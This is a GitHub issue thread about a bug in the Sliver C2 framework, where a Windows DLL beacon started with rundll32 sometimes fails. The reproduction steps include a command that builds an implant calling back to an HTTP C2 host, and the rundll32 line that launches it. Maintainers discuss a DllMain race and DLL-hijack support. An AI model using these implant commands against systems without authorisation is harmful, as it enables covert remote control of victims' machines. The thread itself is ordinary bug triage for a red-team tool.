### ISSUE TITLE
Windows shared Sliver payload fails randomly when ran with Rundll32

### ISSUE THREAD

**Issue by j0nh4t** [BishopFox/sliver#597]
**Describe the bug**
Sometimes executing Sliver agent with rundll32 just fails. This happens around 1/10 times, but sometimes may be consistent on the very first execution.

Eventually it will run, but can also fail on subsequent executions.

Cannot find anything in `sliver.log` with level 5 during build phase or when executing rundll32 on Windows.

A picture is a thousand words, pls see video.

**To Reproduce**
Using docker container:
```bash
sudo docker build --no-cache -t "sliver-test" .
sudo docker create -ti \
        --name sliver-test \
        --net="host" \
        sliver-test
sudo docker start -ai sliver-test
```

In sliver client:
```
https

generate beacon -f shared --http 10.13.37.60 -e -y user567
```

On windows host:
```
rundll32.exe MODERN_COWBOY.dll,StartW
```

**Expected behavior**
Sliver agent is started

**Video**

https://user-images.githubusercontent.com/18689649/153725242-c37dd8d1-8dfb-4840-bb01-aabc6e6d172c.mp4

**Versions:**
[*] Client v1.5.4 - 3826ca851e2fce45962f51b9ead0a0840177c88b - linux/amd64
    Compiled at 2022-02-12 16:03:08 +0000 UTC
    Compiled with go version go1.17.7 linux/amd64

[*] Server v1.5.4 - 3826ca851e2fce45962f51b9ead0a0840177c88b - linux/amd64
    Compiled at 2022-02-12 16:03:08 +0000 UTC

Windows 10 Pro
10.0.19044

**Comment by moloch--** [comment]
Thoughts @rkervella maybe some kinda race?

**Comment by rkervella** [comment]
Definitely sounds like a race in `DllMain`.

**Comment by moloch--** [comment]
I assume it's because we're creating a thread in `DllMain`, which is generally a no-no

**Comment by rkervella** [comment]
Yeah, I'm greatly considering just removing that part of the code. It was initially added so we could use Sliver DLLs for DLL hijacks, but that's a super rare edge case, best covered by other tools or methods (that can then load a Sliver implant).

**Comment by moloch--** [comment]
Yea we probably still want the option to trigger the payload from `DllMain`, but probably needs to be more of an opt-in

**Comment by rkervella** [comment]
Thinking about it, removing it would break the `dllhijack` command.

**Comment by moloch--** [comment]
Yea, can we just hide it behind a flag?

**Comment by rkervella** [comment]
Sure, we can do that and add it to the `ImplantConfig`.

**Comment by Werew1942** [comment]
Same problem here
